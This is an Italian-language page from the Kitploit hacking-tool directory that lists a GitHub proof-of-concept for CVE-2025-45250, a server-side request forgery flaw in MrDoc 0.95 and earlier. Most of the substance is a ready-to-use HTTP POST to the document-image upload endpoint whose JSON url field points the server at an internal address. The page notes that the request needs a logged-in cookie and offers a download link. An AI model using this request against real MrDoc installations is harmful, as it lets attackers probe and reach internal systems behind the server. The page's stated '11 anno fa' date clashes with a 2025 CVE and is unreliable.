Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-45250 — Proof-of-concept exploit per CVE-2025-45250, una vulnerabilità SSRF nella funzione validate_url di MrDoc, che consente ad attaccanti autenticati di effettuare richieste interne. | Kitploit
Strumenti/GitHubGitHub/anike-x/cve-2025-45250
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza Web
GitHubanike-x/cve-2025-45250

CVE-2025-45250

Proof-of-concept exploit per CVE-2025-45250, una vulnerabilità SSRF nella funzione validate_url di MrDoc, che consente ad attaccanti autenticati di effettuare richieste interne.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-45250

Descrizione suggerita

root@kitploit:~
MrDoc <=0.95 è vulnerabile a Server-Side Request Forgery (SSRF) nella funzione validate_url del file app_doc/utils.py.

POC

root@kitploit:~
POST /upload_doc_img/ HTTP/1.1
Host: ip:port
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: your cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{
  "url": "http://127.0.0.2"
}

Per riprodurre questa vulnerabilità, è necessario aver effettuato l'accesso per ottenere il valore del cookie. Consente a un attaccante di ingannare un server affinché effettui richieste dannose verso sistemi interni o esterni.

Scarica lo strumento